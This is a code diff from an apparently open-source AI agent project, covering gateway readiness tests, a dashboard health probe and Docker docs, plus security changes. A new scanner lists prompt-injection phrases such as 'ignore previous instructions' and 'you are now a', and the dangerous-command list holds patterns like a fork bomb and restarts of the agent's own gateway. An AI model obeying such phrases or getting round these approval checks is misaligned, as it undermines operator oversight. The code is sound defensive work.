patch("agent.skill_commands.get_skill_commands", return_value=fake_cmds),
patch("tools.skills_tool.SKILLS_DIR", tmp_path / "skills"),
):
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=set(),
)
# Both should be under 'mlops' regardless of sub-category
assert "mlops" in categories
names = {n for n, _d, _k in categories["mlops"]}
assert "axolotl" in names
assert "vllm" in names
assert len(uncategorized) == 0
+164 -2
View File
@@ -6,12 +6,21 @@ from pathlib import Path
from types import SimpleNamespace
import hermes_cli.gateway as gateway_cli
import pytest
from gateway.restart import (
DEFAULT_GATEWAY_RESTART_DRAIN_TIMEOUT,
GATEWAY_SERVICE_RESTART_EXIT_CODE,
)
_REAL_AWAIT_SERVICE_READY = gateway_cli._await_service_ready_or_exit
@pytest.fixture(autouse=True)
def _stub_service_readiness(monkeypatch):
monkeypatch.setattr(gateway_cli, "_await_service_ready_or_exit", lambda **kwargs: None)
class TestSystemdServiceRefresh:
def test_systemd_install_repairs_outdated_unit_without_force(self, tmp_path, monkeypatch):
unit_path = tmp_path / "hermes-gateway.service"
@@ -82,6 +91,30 @@ class TestSystemdServiceRefresh:
["systemctl", "--user", "reload-or-restart", gateway_cli.get_service_name()],
]
def test_systemd_start_waits_for_readiness_before_reporting_success(self, monkeypatch):
calls = []
monkeypatch.setattr(gateway_cli, "_select_systemd_scope", lambda system=False: False)
monkeypatch.setattr(gateway_cli, "refresh_systemd_unit_if_needed", lambda system=False: calls.append(("refresh", system)))
monkeypatch.setattr(
gateway_cli,
"_run_systemctl",
lambda cmd, system=False, check=True, timeout=30, **kwargs: calls.append((tuple(cmd), system, timeout)),
)
monkeypatch.setattr(
gateway_cli,
"_await_service_ready_or_exit",
lambda **kwargs: calls.append(("ready", kwargs)),
)
gateway_cli.systemd_start()
assert calls == [
("refresh", False),
(("start", gateway_cli.get_service_name()), False, 30),
("ready", {"action": "start"}),
]
class TestGeneratedSystemdUnits:
def test_user_unit_avoids_recursive_execstop_and_uses_extended_stop_timeout(self):
@@ -268,6 +301,32 @@ class TestLaunchdServiceRecovery:
["launchctl", "kickstart", target],
]
def test_launchd_start_waits_for_readiness_before_reporting_success(self, tmp_path, monkeypatch):
plist_path = tmp_path / "ai.hermes.gateway.plist"
plist_path.write_text(gateway_cli.generate_launchd_plist(), encoding="utf-8")
label = gateway_cli.get_launchd_label()
calls = []
monkeypatch.setattr(gateway_cli, "get_launchd_plist_path", lambda: plist_path)
monkeypatch.setattr(gateway_cli, "refresh_launchd_plist_if_needed", lambda: None)
monkeypatch.setattr(
gateway_cli.subprocess,
"run",
lambda cmd, check=False, **kwargs: calls.append(cmd) or SimpleNamespace(returncode=0, stdout="", stderr=""),
)
monkeypatch.setattr(
gateway_cli,
"_await_service_ready_or_exit",
lambda **kwargs: calls.append(("ready", kwargs)),
)
gateway_cli.launchd_start()
assert calls == [
["launchctl", "kickstart", f"{gateway_cli._launchd_domain()}/{label}"],
("ready", {"action": "start"}),
]
def test_launchd_restart_drains_running_gateway_before_kickstart(self, monkeypatch):
calls = []
target = f"{gateway_cli._launchd_domain()}/{gateway_cli.get_launchd_label()}"
@@ -315,7 +374,7 @@ class TestLaunchdServiceRecovery:
gateway_cli.launchd_restart()
assert calls == [("self", 321)]
assert "restart requested" in capsys.readouterr().out.lower()
assert "service restarted" in capsys.readouterr().out.lower()
def test_launchd_stop_uses_bootout_not_kill(self, monkeypatch):
"""launchd_stop must bootout the service so KeepAlive doesn't respawn it."""
@@ -393,6 +452,109 @@ class TestLaunchdServiceRecovery:
assert "not loaded" in output.lower()
class TestGatewayServiceReadiness:
def test_wait_for_service_readiness_accepts_running_gateway_without_checks(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {"pid": 123, "gateway_state": "running", "startup_checks": {}},
)
warnings = gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
assert warnings == []
def test_wait_for_service_readiness_ignores_stale_runtime_state_until_pid_matches(self, monkeypatch):
runtime_states = iter(
[
{"pid": 999, "gateway_state": "running", "startup_checks": {}},
{"pid": 123, "gateway_state": "running", "startup_checks": {}},
]
)
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr("gateway.status.read_runtime_status", lambda: next(runtime_states))
warnings = gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
assert warnings == []
def test_wait_for_service_readiness_returns_optional_pending_warnings(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {
"pid": 123,
"gateway_state": "running",
"startup_checks": {
"optional-check": {
"state": "pending",
"required": False,
"source": "test-hook",
"detail": "still warming",
}
},
},
)
warnings = gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
assert warnings == ["pending: optional-check (test-hook): still warming"]
def test_wait_for_service_readiness_fails_when_required_check_fails(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {
"pid": 123,
"gateway_state": "running",
"startup_checks": {
"beam-runtime": {
"state": "failed",
"required": True,
"source": "beam",
"detail": "RPC boot failed",
}
},
},
)
with pytest.raises(RuntimeError, match=r"required startup checks failed: beam-runtime \(beam\): RPC boot failed"):
gateway_cli._wait_for_service_readiness(action="start", timeout=0.1, poll_interval=0.0)
def test_wait_for_service_readiness_times_out_on_pending_required_check(self, monkeypatch):
monkeypatch.setattr("gateway.status.get_running_pid", lambda: 123)
monkeypatch.setattr(
"gateway.status.read_runtime_status",
lambda: {
"pid": 123,
"gateway_state": "running",
"startup_checks": {
"beam-runtime": {
"state": "pending",
"required": True,
"source": "beam",
"detail": "waiting for runtime",
}
},
},
)
with pytest.raises(RuntimeError, match=r"timed out waiting for required startup checks: beam-runtime \(beam\): waiting for runtime"):
gateway_cli._wait_for_service_readiness(action="start", timeout=0.01, poll_interval=0.0)
def test_await_service_ready_or_exit_raises_system_exit_when_not_ready(self, monkeypatch):
monkeypatch.setattr(gateway_cli, "_await_service_ready_or_exit", _REAL_AWAIT_SERVICE_READY)
monkeypatch.setattr(
gateway_cli,
"_wait_for_service_readiness",
lambda **kwargs: (_ for _ in ()).throw(RuntimeError("not ready")),
)
with pytest.raises(SystemExit, match="1"):
gateway_cli._await_service_ready_or_exit(action="start")
class TestGatewayServiceDetection:
def test_supports_systemd_services_requires_systemctl_binary(self, monkeypatch):
monkeypatch.setattr(gateway_cli, "is_linux", lambda: True)
@@ -475,7 +637,7 @@ class TestGatewaySystemServiceRouting:
gateway_cli.systemd_restart()
assert calls == [("refresh", False), ("self", 654)]
assert "restart requested" in capsys.readouterr().out.lower()
assert "service restarted" in capsys.readouterr().out.lower()
def test_gateway_install_passes_system_flags(self, monkeypatch):
monkeypatch.setattr(gateway_cli, "supports_systemd_services", lambda: True)
+192
View File
@@ -984,3 +984,195 @@ class TestModelInfoEndpoint:
assert resp.status_code == 200
data = resp.json()
assert data["auto_context_length"] == 0
# ---------------------------------------------------------------------------
# Gateway health probe tests
# ---------------------------------------------------------------------------
class TestProbeGatewayHealth:
"""Tests for _probe_gateway_health() — cross-container gateway detection."""
def test_returns_false_when_no_url_configured(self, monkeypatch):
"""When GATEWAY_HEALTH_URL is unset, the probe returns (False, None)."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", None)
alive, body = ws._probe_gateway_health()
assert alive is False
assert body is None
def test_normalizes_url_with_health_suffix(self, monkeypatch):
"""If the user sets the URL to include /health, it's stripped to base."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642/health")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
# Both paths should fail (no server), but we verify they were constructed
# correctly by checking the URLs attempted.
calls = []
original_urlopen = ws.urllib.request.urlopen
def mock_urlopen(req, **kwargs):
calls.append(req.full_url)
raise ConnectionError("mock")
monkeypatch.setattr(ws.urllib.request, "urlopen", mock_urlopen)
alive, body = ws._probe_gateway_health()
assert alive is False
assert "http://gw:8642/health/detailed" in calls
assert "http://gw:8642/health" in calls
def test_normalizes_url_with_health_detailed_suffix(self, monkeypatch):
"""If the user sets the URL to include /health/detailed, it's stripped to base."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642/health/detailed")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
calls = []
def mock_urlopen(req, **kwargs):
calls.append(req.full_url)
raise ConnectionError("mock")
monkeypatch.setattr(ws.urllib.request, "urlopen", mock_urlopen)
ws._probe_gateway_health()
assert "http://gw:8642/health/detailed" in calls
assert "http://gw:8642/health" in calls
def test_successful_detailed_probe(self, monkeypatch):
"""Successful /health/detailed probe returns (True, body_dict)."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
response_body = json.dumps({
"status": "ok",
"gateway_state": "running",
"pid": 42,
})
mock_resp = MagicMock()
mock_resp.status = 200
mock_resp.read.return_value = response_body.encode()
mock_resp.__enter__ = MagicMock(return_value=mock_resp)
mock_resp.__exit__ = MagicMock(return_value=False)
monkeypatch.setattr(ws.urllib.request, "urlopen", lambda req, **kw: mock_resp)
alive, body = ws._probe_gateway_health()
assert alive is True
assert body["status"] == "ok"
assert body["pid"] == 42
def test_detailed_fails_falls_back_to_simple_health(self, monkeypatch):
"""If /health/detailed fails, falls back to /health."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_TIMEOUT", 1)
call_count = [0]
def mock_urlopen(req, **kwargs):
call_count[0] += 1
if call_count[0] == 1:
raise ConnectionError("detailed failed")
mock_resp = MagicMock()
mock_resp.status = 200
mock_resp.read.return_value = json.dumps({"status": "ok"}).encode()
mock_resp.__enter__ = MagicMock(return_value=mock_resp)
mock_resp.__exit__ = MagicMock(return_value=False)
return mock_resp
monkeypatch.setattr(ws.urllib.request, "urlopen", mock_urlopen)
alive, body = ws._probe_gateway_health()
assert alive is True
assert body["status"] == "ok"
assert call_count[0] == 2
class TestStatusRemoteGateway:
"""Tests for /api/status with remote gateway health fallback."""
@pytest.fixture(autouse=True)
def _setup_test_client(self):
try:
from starlette.testclient import TestClient
except ImportError:
pytest.skip("fastapi/starlette not installed")
from hermes_cli.web_server import app, _SESSION_TOKEN
self.client = TestClient(app)
self.client.headers["Authorization"] = f"Bearer {_SESSION_TOKEN}"
def test_status_falls_back_to_remote_probe(self, monkeypatch):
"""When local PID check fails and remote probe succeeds, gateway shows running."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: None)
monkeypatch.setattr(ws, "read_runtime_status", lambda: None)
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_probe_gateway_health", lambda: (True, {
"status": "ok",
"gateway_state": "running",
"platforms": {"telegram": {"state": "connected"}},
"pid": 999,
}))
resp = self.client.get("/api/status")
assert resp.status_code == 200
data = resp.json()
assert data["gateway_running"] is True
assert data["gateway_pid"] == 999
assert data["gateway_state"] == "running"
def test_status_remote_probe_not_attempted_when_local_pid_found(self, monkeypatch):
"""When local PID check succeeds, the remote probe is never called."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: 1234)
monkeypatch.setattr(ws, "read_runtime_status", lambda: {
"gateway_state": "running",
"platforms": {},
})
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
probe_called = [False]
original = ws._probe_gateway_health
def track_probe():
probe_called[0] = True
return original()
monkeypatch.setattr(ws, "_probe_gateway_health", track_probe)
resp = self.client.get("/api/status")
assert resp.status_code == 200
assert not probe_called[0]
def test_status_remote_probe_not_attempted_when_no_url(self, monkeypatch):
"""When GATEWAY_HEALTH_URL is unset, no probe is attempted."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: None)
monkeypatch.setattr(ws, "read_runtime_status", lambda: None)
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", None)
resp = self.client.get("/api/status")
assert resp.status_code == 200
data = resp.json()
assert data["gateway_running"] is False
def test_status_remote_running_null_pid(self, monkeypatch):
"""Remote gateway running but PID not in response — pid should be None."""
import hermes_cli.web_server as ws
monkeypatch.setattr(ws, "get_running_pid", lambda: None)
monkeypatch.setattr(ws, "read_runtime_status", lambda: None)
monkeypatch.setattr(ws, "_GATEWAY_HEALTH_URL", "http://gw:8642")
monkeypatch.setattr(ws, "_probe_gateway_health", lambda: (True, {
"status": "ok",
}))
resp = self.client.get("/api/status")
assert resp.status_code == 200
data = resp.json()
assert data["gateway_running"] is True
assert data["gateway_pid"] is None
assert data["gateway_state"] == "running"
+4 -3
View File
@@ -550,11 +550,12 @@ class TestGatewayProtection:
dangerous, key, desc = detect_dangerous_command(cmd)
assert dangerous is False
def test_systemctl_restart_not_flagged(self):
"""Using systemctl to manage the gateway is the correct approach."""
def test_systemctl_restart_flagged(self):
"""systemctl restart kills running agents and should require approval."""
cmd = "systemctl --user restart hermes-gateway"
dangerous, key, desc = detect_dangerous_command(cmd)
assert dangerous is False
assert dangerous is True
assert "stop/restart" in desc
def test_pkill_hermes_detected(self):
"""pkill targeting hermes/gateway processes must be caught."""
+5 -3
View File
@@ -2837,7 +2837,7 @@ class TestRegistryCollisionWarning:
"""registry.register() warns when a tool name is overwritten by a different toolset."""
def test_overwrite_different_toolset_logs_warning(self, caplog):
"""Overwriting a tool from a different toolset emits a warning."""
"""Overwriting a tool from a different toolset is REJECTED with an error."""
from tools.registry import ToolRegistry
import logging
@@ -2847,11 +2847,13 @@ class TestRegistryCollisionWarning:
reg.register(name="my_tool", toolset="builtin", schema=schema, handler=handler)
with caplog.at_level(logging.WARNING, logger="tools.registry"):
with caplog.at_level(logging.ERROR, logger="tools.registry"):
reg.register(name="my_tool", toolset="mcp-ext", schema=schema, handler=handler)
assert any("collision" in r.message.lower() for r in caplog.records)
assert any("rejected" in r.message.lower() for r in caplog.records)
assert any("builtin" in r.message and "mcp-ext" in r.message for r in caplog.records)
# The original tool should still be from 'builtin', not overwritten
assert reg.get_toolset_for_tool("my_tool") == "builtin"
def test_overwrite_same_toolset_no_warning(self, caplog):
"""Re-registering within the same toolset is silent (e.g. reconnect)."""
+6 -1
View File
@@ -87,7 +87,7 @@ DANGEROUS_PATTERNS = [
(r'\bDELETE\s+FROM\b(?!.*\bWHERE\b)', "SQL DELETE without WHERE"),
(r'\bTRUNCATE\s+(TABLE)?\s*\w', "SQL TRUNCATE"),
(r'>\s*/etc/', "overwrite system config"),
(r'\bsystemctl\s+(stop|disable|mask)\b', "stop/disable system service"),
(r'\bsystemctl\s+(-[^\s]+\s+)*(stop|restart|disable|mask)\b', "stop/restart system service"),
(r'\bkill\s+-9\s+-1\b', "kill all processes"),
(r'\bpkill\s+-9\b', "force kill processes"),
(r':\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:', "fork bomb"),
@@ -101,6 +101,11 @@ DANGEROUS_PATTERNS = [
(r'\bxargs\s+.*\brm\b', "xargs with rm"),
(r'\bfind\b.*-exec\s+(/\S*/)?rm\b', "find -exec rm"),
(r'\bfind\b.*-delete\b', "find -delete"),
# Gateway lifecycle protection: prevent the agent from killing its own
# gateway process. These commands trigger a gateway restart/stop that
# terminates all running agents mid-work.
(r'\bhermes\s+gateway\s+(stop|restart)\b', "stop/restart hermes gateway (kills running agents)"),
(r'\bhermes\s+update\b', "hermes update (restarts gateway, kills running agents)"),
# Gateway protection: never start gateway outside systemd management
(r'gateway\s+run\b.*(&\s*$|&\s*;|\bdisown\b|\bsetsid\b)', "start gateway outside systemd (use 'systemctl --user restart hermes-gateway')"),
(r'\bnohup\b.*gateway\s+run\b', "start gateway outside systemd (use 'systemctl --user restart hermes-gateway')"),
+79 -4
View File
@@ -219,6 +219,58 @@ def _sanitize_error(text: str) -> str:
return _CREDENTIAL_PATTERN.sub("[REDACTED]", text)
# ---------------------------------------------------------------------------
# MCP tool description content scanning
# ---------------------------------------------------------------------------
# Patterns that indicate potential prompt injection in MCP tool descriptions.
# These are WARNING-level — we log but don't block, since false positives
# would break legitimate MCP servers.
_MCP_INJECTION_PATTERNS = [
(re.compile(r"ignore\s+(all\s+)?previous\s+instructions", re.I),
"prompt override attempt ('ignore previous instructions')"),
(re.compile(r"you\s+are\s+now\s+a", re.I),
"identity override attempt ('you are now a...')"),
(re.compile(r"your\s+new\s+(task|role|instructions?)\s+(is|are)", re.I),
"task override attempt"),
(re.compile(r"system\s*:\s*", re.I),
"system prompt injection attempt"),
(re.compile(r"<\s*(system|human|assistant)\s*>", re.I),
"role tag injection attempt"),
(re.compile(r"do\s+not\s+(tell|inform|mention|reveal)", re.I),
"concealment instruction"),
(re.compile(r"(curl|wget|fetch)\s+https?://", re.I),
"network command in description"),
(re.compile(r"base64\.(b64decode|decodebytes)", re.I),
"base64 decode reference"),
(re.compile(r"exec\s*\(|eval\s*\(", re.I),
"code execution reference"),
(re.compile(r"import\s+(subprocess|os|shutil|socket)", re.I),
"dangerous import reference"),
]
def _scan_mcp_description(server_name: str, tool_name: str, description: str) -> List[str]:
"""Scan an MCP tool description for prompt injection patterns.
Returns a list of finding strings (empty = clean).
"""
findings = []
if not description:
return findings
for pattern, reason in _MCP_INJECTION_PATTERNS:
if pattern.search(description):
findings.append(reason)
if findings:
logger.warning(
"MCP server '%s' tool '%s': suspicious description content — %s. "
"Description: %.200s",
server_name, tool_name, "; ".join(findings),
description,
)
return findings
def _prepend_path(env: dict, directory: str) -> dict:
"""Prepend *directory* to env PATH if it is not already present."""
updated = dict(env or {})
@@ -798,6 +850,9 @@ class MCPServerTask:
from toolsets import TOOLSETS
async with self._refresh_lock:
# Capture old tool names for change diff
old_tool_names = set(self._registered_tool_names)
# 1. Fetch current tool list from server
tools_result = await self.session.list_tools()
new_mcp_tools = tools_result.tools if hasattr(tools_result, "tools") else []
@@ -817,10 +872,26 @@ class MCPServerTask:
self.name, self, self._config
)
logger.info(
"MCP server '%s': dynamically refreshed %d tool(s)",
self.name, len(self._registered_tool_names),
)
# 5. Log what changed (user-visible notification)
new_tool_names = set(self._registered_tool_names)
added = new_tool_names - old_tool_names
removed = old_tool_names - new_tool_names
changes = []
if added:
changes.append(f"added: {', '.join(sorted(added))}")
if removed:
changes.append(f"removed: {', '.join(sorted(removed))}")
if changes:
logger.warning(
"MCP server '%s': tools changed dynamically — %s. "
"Verify these changes are expected.",
self.name, "; ".join(changes),
)
else:
logger.info(
"MCP server '%s': dynamically refreshed %d tool(s) (no changes)",
self.name, len(self._registered_tool_names),
)
async def _run_stdio(self, config: dict):
"""Run the server using stdio transport."""
@@ -1838,6 +1909,10 @@ def _register_server_tools(name: str, server: MCPServerTask, config: dict) -> Li
if not _should_register(mcp_tool.name):
logger.debug("MCP server '%s': skipping tool '%s' (filtered by config)", name, mcp_tool.name)
continue
# Scan tool description for prompt injection patterns
_scan_mcp_description(name, mcp_tool.name, mcp_tool.description or "")
schema = _convert_mcp_schema(name, mcp_tool)
tool_name_prefixed = schema["name"]
+20 -4
View File
@@ -117,11 +117,27 @@ class ToolRegistry:
with self._lock:
existing = self._tools.get(name)
if existing and existing.toolset != toolset:
logger.warning(
"Tool name collision: '%s' (toolset '%s') is being "
"overwritten by toolset '%s'",
name, existing.toolset, toolset,
# Allow MCP-to-MCP overwrites (legitimate: server refresh,
# or two MCP servers with overlapping tool names).
both_mcp = (
existing.toolset.startswith("mcp-")
and toolset.startswith("mcp-")
)
if both_mcp:
logger.debug(
"Tool '%s': MCP toolset '%s' overwriting MCP toolset '%s'",
name, toolset, existing.toolset,
)
else:
# Reject shadowing — prevent plugins/MCP from overwriting
# built-in tools or vice versa.
logger.error(
"Tool registration REJECTED: '%s' (toolset '%s') would "
"shadow existing tool from toolset '%s'. Deregister the "
"existing tool first if this is intentional.",
name, toolset, existing.toolset,
)
return
self._tools[name] = ToolEntry(
name=name,
toolset=toolset,
+4 -4
View File
@@ -64,11 +64,11 @@ def _security_scan_skill(skill_dir: Path) -> Optional[str]:
report = format_scan_report(result)
return f"Security scan blocked this skill ({reason}):\n{report}"
if allowed is None:
# "ask" — allow but include the warning so the user sees the findings
# "ask" verdict — for agent-created skills this means dangerous
# findings were detected. Block the skill and include the report.
report = format_scan_report(result)
logger.warning("Agent-created skill has security findings: %s", reason)
# Don't block — return None to allow, but log the warning
return None
logger.warning("Agent-created skill blocked (dangerous findings): %s", reason)
return f"Security scan blocked this skill ({reason}):\n{report}"
except Exception as e:
logger.warning("Security scan failed for %s: %s", skill_dir, e, exc_info=True)
return None
+1
View File
@@ -80,6 +80,7 @@ export const en: Translations = {
notRunning: "Not running",
startFailed: "Start failed",
pid: "PID",
runningRemote: "Running (remote)",
noneRunning: "None",
gatewayFailedToStart: "Gateway failed to start",
lastUpdate: "Last update",
+1
View File
@@ -83,6 +83,7 @@ export interface Translations {
notRunning: string;
startFailed: string;
pid: string;
runningRemote: string;
noneRunning: string;
gatewayFailedToStart: string;
lastUpdate: string;
+1
View File
@@ -80,6 +80,7 @@ export const zh: Translations = {
notRunning: "未运行",
startFailed: "启动失败",
pid: "进程",
runningRemote: "运行中(远程)",
noneRunning: "无",
gatewayFailedToStart: "网关启动失败",
lastUpdate: "最后更新",
+2 -1
View File
@@ -53,7 +53,8 @@ export default function StatusPage() {
};
function gatewayValue(): string {
if (status!.gateway_running) return `${t.status.pid} ${status!.gateway_pid}`;
if (status!.gateway_running && status!.gateway_pid) return `${t.status.pid} ${status!.gateway_pid}`;
if (status!.gateway_running) return t.status.runningRemote;
if (status!.gateway_state === "startup_failed") return t.status.startFailed;
return t.status.notRunning;
}
+62 -4
View File
@@ -35,9 +35,39 @@ docker run -d \
--name hermes \
--restart unless-stopped \
-v ~/.hermes:/opt/data \
-p 8642:8642 \
nousresearch/hermes-agent gateway run
```
Port 8642 exposes the gateway's [OpenAI-compatible API server](./api-server.md) and health endpoint. It's optional if you only use chat platforms (Telegram, Discord, etc.), but required if you want the dashboard or external tools to reach the gateway.
Opening any port on an internet facing machine is a security risk. You should not do it unless you understand the risks.
## Running the dashboard
The built-in web dashboard can run alongside the gateway as a separate container.
To run the dashboard as its own container, point it at the gateway's health endpoint so it can detect gateway status across containers:
```sh
docker run -d \
--name hermes-dashboard \
--restart unless-stopped \
-v ~/.hermes:/opt/data \
-p 9119:9119 \
-e GATEWAY_HEALTH_URL=http://$HOST_IP:8642 \
nousresearch/hermes-agent dashboard
```
Replace `$HOST_IP` with the IP address of the machine running the gateway container (e.g. `192.168.1.100`), or use a Docker network hostname if both containers share a network (see the [Compose example](#docker-compose-example) below).
| Environment variable | Description | Default |
|---------------------|-------------|---------|
| `GATEWAY_HEALTH_URL` | Base URL of the gateway's API server, e.g. `http://gateway:8642` | *(unset — local PID check only)* |
| `GATEWAY_HEALTH_TIMEOUT` | Health probe timeout in seconds | `3` |
Without `GATEWAY_HEALTH_URL`, the dashboard falls back to local process detection — which only works when the gateway runs in the same container or on the same host.
## Running interactively (CLI chat)
To open an interactive chat session against a running data directory:
@@ -66,7 +96,7 @@ The `/opt/data` volume is the single source of truth for all Hermes state. It ma
| `skins/` | Custom CLI skins |
:::warning
Never run two Hermes containers against the same data directory simultaneously — session files and memory stores are not designed for concurrent access.
Never run two Hermes **gateway** containers against the same data directory simultaneously — session files and memory stores are not designed for concurrent write access. Running a dashboard container alongside the gateway is safe since the dashboard only reads data.
:::
## Environment variable forwarding
@@ -85,18 +115,21 @@ Direct `-e` flags override values from `.env`. This is useful for CI/CD or secre
## Docker Compose example
For persistent gateway deployment, a `docker-compose.yaml` is convenient:
For persistent deployment with both the gateway and dashboard, a `docker-compose.yaml` is convenient:
```yaml
version: "3.8"
services:
hermes:
image: nousresearch/hermes-agent:latest
container_name: hermes
restart: unless-stopped
command: gateway run
ports:
- "8642:8642"
volumes:
- ~/.hermes:/opt/data
networks:
- hermes-net
# Uncomment to forward specific env vars instead of using .env file:
# environment:
# - ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY}
@@ -107,9 +140,34 @@ services:
limits:
memory: 4G
cpus: "2.0"
dashboard:
image: nousresearch/hermes-agent:latest
container_name: hermes-dashboard
restart: unless-stopped
command: dashboard --host 0.0.0.0
ports:
- "9119:9119"
volumes:
- ~/.hermes:/opt/data
environment:
- GATEWAY_HEALTH_URL=http://hermes:8642
networks:
- hermes-net
depends_on:
- hermes
deploy:
resources:
limits:
memory: 512M
cpus: "0.5"
networks:
hermes-net:
driver: bridge
```
Start with `docker compose up -d` and view logs with `docker compose logs -f hermes`.
Start with `docker compose up -d` and view logs with `docker compose logs -f`.
## Resource limits